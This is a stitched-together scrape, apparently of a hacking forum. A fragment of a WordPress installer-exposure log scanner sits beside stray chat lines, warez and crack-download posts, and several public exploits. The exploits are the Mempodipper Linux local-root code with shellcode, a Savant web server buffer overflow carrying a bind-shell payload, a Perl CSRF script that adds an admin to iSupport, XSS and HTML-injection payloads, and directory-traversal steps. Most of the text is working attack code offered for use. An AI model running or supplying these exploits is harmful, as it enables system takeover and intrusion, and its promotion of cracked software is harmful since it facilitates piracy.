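    Returns {"exposed": bool, "hits": [...], "bruteforce_ips": [...]}.
    Any installer request from a non-allowlisted client counts as exposure,
    whatever the status code: the advisory's point is that outsiders should
    not be able to reach these scripts at all. A client sending at least
    post_threshold step=2 POSTs is reported separately, since each such POST
    is one MySQL credential check relayed through the web server.
    """
    hits = []
    step2_posts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] not in INSTALLER_PATHS:
            continue
        if rec["ip"] in allowlist:
            continue  # the administrator's own installation run
        hits.append(rec)
        if rec["method"] == "POST" and "step=2" in rec["query"]:
            step2_posts[rec["ip"]] += 1
    return {
        "exposed": bool(hits),
        "hits": hits,
        "bruteforce_ips": sorted(ip for ip, n in step2_posts.items() if n >= post_threshold),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG.splitlines(), allowlist=frozenset({"10.0.0.5"}))
    print("installer reachable from outside:", report["exposed"])
    for rec in report["hits"]:
        print(f'  {rec["ip"]} {rec["method"]} {rec["path"]}?{rec["query"]} -> {rec["status"]}')
    print("clients repeating step=2 POSTs:", report["bruteforce_ips"])
```

Access logs do not carry the POST body, so the `dbhost` value (the W.X.Y.Z or L.M.N.O placeholder in the advisory's requests) is not visible here; that is what a WAF rule sees and a plain log scan does not. The scan is still enough to answer the question the advisory asks: whether the installer is reachable from outside at all, and a positive result means removing or blocking `/wp-admin/setup-config.php` and `/wp-admin/install.php` at the web server rather than tuning the threshold.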
  12. If you make those purchases, do them quickly at my place; it's limited to 2 hours.
  13. Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit

Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Blog post about it is here: http://blog.zx2c4.com/749

# Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
# Date: Jan 21, 2012
# Author: zx2c4
# Tested on: Gentoo, Ubuntu
# Platform: Linux
# Category: Local
# CVE-2012-0056

/*
 * Mempodipper
 * by zx2c4
 *
 * Linux Local Root Exploit
 *
 * Rather than put my write up here, per usual, this time I've put it
 * in a rather lengthy blog post: http://blog.zx2c4.com/749
 *
 * Enjoy.
 *
 * - zx2c4
 * Jan 21, 2012
 *
 * CVE-2012-0056
 */

#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>

char *socket_path = "/tmp/.sockpuppet";

int send_fd(int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    int n;
    int sock;
    char cms[CMSG_SPACE(sizeof(int))];

    if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;

    buf[0] = 0;
    iov.iov_base = buf;
    iov.iov_len = 1;

    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = CMSG_LEN(sizeof(int));

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memmove(CMSG_DATA(cmsg), &fd, sizeof(int));

    if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
        return -1;
    close(sock);
    return 0;
}

int recv_fd()
{
    int listener;
    int sock;
    int n;
    int fd;
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    char cms[CMSG_SPACE(sizeof(int))];

    if ((listener = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    unlink(socket_path);
    if (bind(listener, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;
    if (listen(listener, 1) < 0)
        return -1;
    if ((sock = accept(listener, NULL, NULL)) < 0)
        return -1;

    iov.iov_base = buf;
    iov.iov_len = 1;

    memset(&msg, 0, sizeof msg);
    msg.msg_name = 0;
    msg.msg_namelen = 0;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = sizeof cms;

    if ((n = recvmsg(sock, &msg, 0)) < 0)
        return -1;
    if (n == 0)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
    close(sock);
    close(listener);
    return fd;
}

int main(int argc, char **argv)
{
    if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
        char parent_mem[256];
        sprintf(parent_mem, "/proc/%s/mem", argv[2]);
        printf("[+] Opening parent mem %s in child.\n", parent_mem);
        int fd = open(parent_mem, O_RDWR);
        if (fd < 0) {
            perror("[-] open");
            return 1;
        }
        printf("[+] Sending fd %d to parent.\n", fd);
        send_fd(fd);
        return 0;
    }

    printf("===============================\n");
    printf("= Mempodipper =\n");
    printf("= by zx2c4 =\n");
    printf("= Jan 21, 2012 =\n");
    printf("===============================\n\n");

    int parent_pid = getpid();
    if (fork()) {
        printf("[+] Waiting for transferred fd in parent.\n");
        int fd = recv_fd();
        printf("[+] Received fd at %d.\n", fd);
        if (fd < 0) {
            perror("[-] recv_fd");
            return -1;
        }
        printf("[+] Assigning fd %d to stderr.\n", fd);
        dup2(2, 6);
        dup2(fd, 2);

        unsigned long address;
        if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
            address = strtoul(argv[2], NULL, 16);
        else {
            printf("[+] Reading su for exit@plt.\n");
            // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
            FILE *command = popen("objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
            char result[32];
            result[0] = 0;
            fgets(result, 32, command);
            pclose(command);
            address = strtoul(result, NULL, 16);
            if (address == ULONG_MAX || !address) {
                printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
                printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
                return 1;
            }
            printf("[+] Resolved exit@plt to 0x%lx.\n", address);
        }
        printf("[+] Calculating su padding.\n");
        FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
        char result[256];
        result[0] = 0;
        fgets(result, 256, command);
        pclose(command);
        unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
        unsigned long offset = address - su_padding;
        printf("[+] Seeking to offset 0x%lx.\n", offset);
        lseek64(fd, offset, SEEK_SET);

#if defined(__i386__)
        // See shellcode-32.s in this package for the source.
        char shellcode[] =
            "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
            "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
            "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
            "\x80";
#elif defined(__x86_64__)
        // See shellcode-64.s in this package for the source.
        char shellcode[] =
            "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
            "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
            "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
            "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
            "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
        printf("[+] Executing su with shellcode.\n");
        execl("/bin/su", "su", shellcode, NULL);
    } else {
        char pid[32];
        sprintf(pid, "%d", parent_pid);
        printf("[+] Executing child from child fork.\n");
        execl("/proc/self/exe", argv[0], "-c", pid, NULL);
    }
}

Source: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
  14. Parsp Shopping CMS [V5] Multiple Vulnerability

# Exploit Title: Parsp Shopping CMS [V5] Multiple Vulnerability
# Date: 2012-01-22 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.parsp.com/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"powered by www.parsp.com V5"
# Version : [5]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
# - Net.Edit0r (Net.edit0r [at] att [dot] net)
# - NoL1m1t (nol1m1t [at] rocketmail [dot] com)

-----------------------------------------------------------------------------------------
Parsp Shopping CMS [V4] Multiple Vulnerability
-----------------------------------------------------------------------------------------

Author : BHG Security Center
Date : 2012-01-22
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG

---------------------------------------------------------------------------

PoC/Exploit:
~~~~~~~~~~

------------- ( WYSIWYG Editor ) ~ ~

[PoC] Http://[victim]/path/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Allowed formats for uploading ~

$Config['AllowedExtensions']['File'] = array( "zip", "rar", "pdf", "doc", "xls", "csv" );
$Config['AllowedExtensions']['Image'] = array( "jpg", "gif", "jpeg", "png" );
$Config['AllowedExtensions']['Flash'] = array( "swf", "fla" );
$Config['AllowedExtensions']['Media'] = array( "swf", "fla", "jpg", "gif", "jpeg", "png", "avi", "mpg", "mpeg" );

Unauthorized extension

$Config['DeniedExtensions']['File'] = array( "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "pwml", "inc", "asp", "aspx", "ascx", "jsp", "cfm", "cfc", "pl", "bat", "exe", "com", "dll", "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "shtm", "phtm" );

------------- ( Cross Site Scripting ) ~ ~

[PoC] ~: Http://[victim]/path/index.php?advanced_search_in_category=[XSS]&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to=

Note: URL encoded GET input advanced_search_in_category was set to ' onmouseover=prompt(923419) bad='

------------- ( Error message on page For Find Directory Address ) ~ ~

[PoC] Http://[victim]/path/printable.php

Note: User and account information on the site, intended for brute-force attacks

------------- ( PHPinfo page Information ) ~ ~

[PoC] Http://[victim]/path/phpinfo.php

Note: Full information about the PHP installed on the server

Timeline:
~~~~~~~~~
- 21 - 01 - 2012 bug found.
- 21 - 01 - 2012 vendor contacted, but no response.
- 22 - 01 - 2012 Advisories release.

Important Notes:
~~~~~~~~~
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.

---------------------------------------------------------------------------

Greetz To: A.Cr0x | 3H34N | tHe.k!ll3r | ArYaIeIrAN | NoL1m1t | G3n3Rall
Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | Cyber C0der And All My Friendz
[!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ

-------------------------------- [ EOF ] ----------------------------------

Source: Parsp Shopping CMS [V5] Multiple Vulnerability
  15. Salespage: SEnuke X SEO Software - The World's First Money Making Machine

Senukex is one of the most advanced link building tools ever developed in the internet marketing field. It is version 2 of the hugely popular senuke tool. It is developed by Areeb Bajwa and Joe Russel. Senuke helps you to create web2.0 accounts, create forum profiles, create bookmarking accounts and bookmark urls, do keyword research and more. Let's see everything in detail very soon in this senukex review. Be fully ready to have a thorough understanding of senukex.

Download: http://www.multiupload.com/I5KXT9WM0U
Mirror: http://www.mirrorcreator.com/files/01F0ZXUO/SenukeX-242.rar_links
Virus Scan: https://www.virustotal.com/file/721ce331ce390ec5c16a28579207259e0c8e39f405bdf4dacf4b61b50514dde2/analysis/
  16. Interesting, I really didn't know that.
  17. I sent you a PM.
  18. http://www.youtube.com/watch?feature=player_embedded&v=IlEa_MMP3KM
  19. The membership only site: Crackit.info - FREE Crack Downloads | Best SEO & Internet Marketing Tools

The site charges $67 to download all its content. All products included [updated 12/1/2012]

Download [978 MB]
D6fxqOzdy0pR3=3=nrSFwoldDmlbw0LKEoxR+dQS+4kbJQ55 (crypted once)

If you want this product, download it ASAP as the links are taken down pretty quickly.
  20. iSupport v1.x CSRF HTML Code Injection to Add Admin

#!/usr/bin/perl
########################################################################
# Title : iSupport v1.x => Html Code injection to add admin
# Author : Or4nG.M4n
# Version : 1.x
# Homepage : http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"
# Homepage : http://www.idevspot.com/
# Thnks :
# +----------------------------------+
# | xSs m4n i-Hmx h311 c0d3 |
# | Dr.Bnned ahwak2000 sa^Dev!L |
# +----------------------------------+
# html injection to add Admin
# vuln : pending_testimonials.php
#
# <tr bgcolor="#F9F9F9">
# <td width="100%"> <b>
# <?php echo $title;?>
# </b> <i>posted by</i> <b>
# <?php echo $name;?>
# </b> [ <a href="<?php echo $website; ?>" target="_blank"><b>Website</b></a> ] <br>
# <i>
# <?php echo $body; ?>
# </i></td>
# <td>
# How i can Fixed ..
# in all vuln file
# Replace : echo $website; echo $title; echo $body; => Replace with => echo htmlspecialchars($website); like this ..
# Thnks to All Stupid Coders

system("cls");
print " +----------------------------------------+\n | iSupport 1.x inject html to Add Admin |\n | Or4nG.M4n sA^Dev!L xSs m4n i-Hmx |\n +----------------------------------------+\n Loading ...\n ";
sleep(3);
print "tragt & path #";
$h = <STDIN>;
chomp $h;
print "User #";
$user = <STDIN>;
chomp $user;
print "Mail #";
$mail = <STDIN>;
chomp $mail;
print "Pass #";
$pass = <STDIN>;
chomp $pass;
$html = '<form name="xss" method="post" action= "'.$h.'/admin/function.php?which=ADMINISTRATORS&return=administrators&id=&t1=NAME&t2=EMAIL&t3=PASSWORD">
<input type="text" name="1" value="'.$user.'" size="30">
<input type="text" name="2" value="'.$mail.'" size="30">
<input type="text" name="3" value="'.$pass.'" size="30">
<script>document.xss.submit();</script>
</form>';
sleep(2);
print "Createing ...\n";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "Createing Done .. \n";
sleep(2);
print "Plz UPLOAD csrf.htm to your Site and Put's Url h3r3 #";
$csrf = <STDIN>;
chomp $csrf;
$done = '<iframe id="iframe" src="'.$csrf.'" width="777" height="678"></iframe>';
sleep(2);
print "NOW INJECT This Code \n";
print $done."\n";
print "";
print "\n Enjoy .. ";
# The End

Source: iSupport v1.x CSRF HTML Code Injection to Add Admin
  21. Nova CMS Directory Traversal

#
# Title : Nova CMS Directory Travel
# Author : Red Security TEAM
# Date : 21/01/2012
# Download : http://www.nova-cms.com/uploads/files/novacms.zip
# Tested On : CentOS
# Dork : Copyright ©2005-2011 by Nova CMS.
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
#
# 1. Register
# 2. Go to forum and click on "NEW TOPIC"
# 3. In the above tab in editor click on last picture "Attach File"
# 4. Start Live HTTP headers
# 5. Add a new allowed file
# 6. Find dir=uploads%2Fforum%2Fdata-YourUsername2F&options=true&ajax=true and click on Reply on Live HTTP headers
# 7. Change to dir=uploads%2F , dir=uploads%2Fbackup%2F
# 8. You can't go back to the directory above the uploads directory, but you can see every directory in uploads, for example other users' files and uploads/backup/
#

Source: Nova CMS Directory Traversal
  22. Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)

#!/usr/bin/python
import socket

target_address="10.10.10.129"
target_port=80

buffer2 = "R0cX" + "R0cX"
# msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
buffer2 += ("\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x6a\x83\xc0\x04\x31\x68\x10\x03\x68\x10\x0e\xc2\x4a\xa1\x17"
"\x59\x49\xc2\xff\x91\x58\x90\x5d\x29\xec\xb0\x10\xb1\x92\xd3"
"\xae\x07\xc5\x35\x4d\x38\xf3\xdb\x06\xfc\xec\x5f\xa5\x66\x93"
"\xcc\x5d\x07\x81\xcb\xcc\x59\x35\x45\xd6\x2d\x15\xa1\xe7\xbb"
"\xd6\x5d\x68\x57\x1b\x2a\x4f\xe8\xdd\xd3\xc0\x84\x0c\x0e\xb7"
"\x03\x24\xc7\xfd\xd2\xa5\x88\x89\xf8\x07\x82\x1b\xcb\x2d\x3b"
"\xfd\x9d\x67\xa9\xff\xe9\x20\x9e\xa9\x25\x8b\x7c\xda\xd9\x01"
"\x32\x51\x36\x9a\xe7\x73\x8f\xe5\xea\x60\xa6\x4c\x78\xef\xbb"
"\x1e\x37\xd0\xbd\xaa\x4f\xe7\x94\x3e\x02\x34\x21\xc6\xc1\xe2"
"\xa3\x6f\x76\x92\x9a\xed\xda\x19\x2d\xca\x21\xb2\xb0\xa9\xb5"
"\x72\xa1\xbb\xd0\x18\x64\xd3\xb4\x85\x0c\x92\xf7\x07\xcf\x13"
"\xc2\x95\x57\x0a\x68\x6d\x94\x6f\x5a\xad\xd1\x82\x26\x9f\x3c"
"\x0d\x2b\xdc\x06\x6a\xd3\x87\x24\x9c\x14\x58\x71\x42\xef\x1b"
"\x90\xdc\x46\x67\x51\xd3\x4c\xc4\x11\x23\x29\xbd\xc5\xab\x96"
"\x54\x5e\xb6\x08\x60\x42\x5f\x7a\x76\xdf\x30\x05\x76\xb7\xd1"
"\xf2\x49\xba\x14\x69\xa7\x7b\xa8\x6b\xb9\xad\xc8\x8e\x0f\x9e"
"\x07\x7f\xa7\x89\x9b\x4d\x68\xbd\x45\x77\xe0\x64\xec\xa2\x18"
"\x2d\x6f\x10\xc3\x14\x1d\x4e\x92\x3a\x8a\xf0\xd8\x07\x12\x19"
"\x27\x0c\x23\xe4\x0b\xbb\x6d\x97\xf8\xe8\x8c\x23\xb5\xe0\x22"
"\xe8\x70\x85\x10\xbb\x64\xbe\x09\x41\xe7\x2d\x6d\x39\xfb\xcc"
"\x09\xee\xca\x8f\x83\x22\x5d\x77\x2b\x5b\xc6\x1b\x82\x6e\x17"
"\x03\xe8\x6c\x35\x55\x71\xd4\x35\x72\x12\x3f\x11\x6e\xcf\x09"
"\x5a\xd0\x33\x40\x8e\x3f\x36\xbf\xd7\xd0\x85\x17\x03\xd3\xc4"
"\x7f\x17\x6e\xe8\x0d\xa6\x5f\x9e\xd6\x1b\xf4\x2b\x8c\xb3\xad"
"\x19\xb3\x70\xac\x56\x76\x0c\xfb\x4f\xc4\x99\xdd\x99\x75\x8f"
"\xa8\xfa\x91\x5c\xfb\x26\xbd\x8a\xea\xec\x0d\xf1\x45\x4f\x72"
"\xd1\x02\x47\x9c\xa5\x33\x1e\xf8\xc7\x00\xd2\x3d\x86\xb4\x7c"
"\xb9\x85\x5f\x8c\x40\x58\x7e\x7c\x5d\x76\x3a\xd6\x0b\x9e\xfe"
"\x88\xc7\x60\x56\x99\x19\x7f\x7a\xda\x93\x72\x99\x3f\x69")

badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX
badbuffer += "\x90" * (254 - len(badbuffer))
badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN

httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14

sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(sendbuf)
sock.close()

Source: Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)
  23. php ireport v1.0 Remote Html Code injection

#!/usr/bin/perl
########################################################################
# Title = phpireport v1.0 => Remote Html Code injection
# Author = Or4nG.M4n
# Download = http://garr.dl.sourceforge.net/project/phpireport/phpireport%20v1.0%20alpha%20revision%2025.rar
# Thnks :
# +----------------------------------+
# | xSs m4n i-Hmx h311 c0d3 |
# | Dr.Bnned ahwak2000 sa^Dev!L |
# +----------------------------------+
#
# Html injection
# vuln : messages_viewer.php
# vuln : home.php
# vuln : history.php
# code :
#
# echo "
# <li>
# <div class='post-details'><div style='float:left'>user: ".stripslashes($name)."</div> <div style='float:right'>".$time."</div></div>
# <br>
# <div class='post-details'>".stripslashes($message)."</div>
# </li>
# ";
# How i can Fixed ..
# in all vuln file
# Replace : stripslashes => Replace with => htmlspecialchars
# Thnks to All Stupid Coders
#

use LWP::UserAgent;

print "Code to inject #";
my $inj = <STDIN>;
chomp $inj;

my $url = 'http://localhost/phpireport/index.php';
my $ua = LWP::UserAgent->new();
my $response = $ua->post( $url, { 'message' => $inj } ); # Post <textarea rows='2' name='message' id='name'></textarea>
my $content = $response->decoded_content();
print "\n done \n";
# The End

Source: php ireport v1.0 Remote Html Code injection